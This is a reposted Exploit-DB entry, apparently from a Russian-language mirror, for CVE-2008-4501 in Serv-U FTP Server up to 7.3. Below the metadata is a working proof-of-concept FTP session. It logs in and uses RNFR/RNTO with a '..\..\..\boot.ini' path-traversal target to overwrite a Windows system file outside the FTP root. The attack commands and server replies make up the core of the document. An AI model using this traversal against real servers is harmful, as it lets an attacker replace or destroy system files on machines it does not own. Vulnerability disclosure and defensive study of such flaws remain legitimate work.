- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6661
- Проверка EDB
-
- Пройдено
- Автор
- DMNT
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2008-4501
- Дата публикации
- 2008-10-03
Код:
#Serv-U <= 7.2.0.1 / 7.3 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.3 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
#boot.ini rewrited
# milw0rm.com [2008-10-03]
- Источник
- www.exploit-db.com